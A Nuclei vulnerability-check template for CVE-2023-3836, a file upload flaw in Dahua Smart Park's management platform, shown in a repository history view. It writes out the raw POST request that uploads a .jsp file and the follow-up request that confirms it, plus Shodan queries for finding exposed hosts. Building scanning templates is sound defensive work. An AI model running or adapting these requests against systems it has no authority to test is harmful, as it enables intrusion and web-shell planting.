nuclei-templates/http/cves/2023/CVE-2023-3836.yaml

58 lines
1.7 KiB
YAML
Raw Normal View History

2023-07-26 09:01:22 +00:00
id: CVE-2023-3836
info:
2023-07-26 09:25:27 +00:00
name: Dahua Smart Park Management - Arbitrary File Upload
2023-07-26 09:01:22 +00:00
author: HuTa0
severity: high
2023-07-26 09:25:27 +00:00
description: |
Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.
2023-07-26 09:01:22 +00:00
reference:
2023-07-26 09:25:27 +00:00
- https://github.com/qiuhuihk/cve/blob/main/upload.md
2023-07-27 18:47:36 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-3836
classification:
cve-id: CVE-2023-3836
2023-07-26 09:01:22 +00:00
metadata:
max-request: 2
2023-07-26 09:25:27 +00:00
shodan-query: html:"/WPMS/asset"
verified: true
zoomeye-query: /WPMS/asset
2023-07-26 09:25:27 +00:00
tags: cve,cve2023,dahua,fileupload,intrusive,rce
2023-07-26 09:01:22 +00:00
variables:
random_str: "{{rand_base(6)}}"
match_str: "{{md5(random_str)}}"
http:
- raw:
- |
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Host: {{Hostname}}
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
{{match_str}}
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
- |
GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && status_code_2 == 200"
- "contains(body_2, '{{match_str}}')"
condition: and
extractors:
- type: regex
name: shell_filename
internal: true
part: body_1
regex:
- 'ico_res_(\w+)_on\.jsp'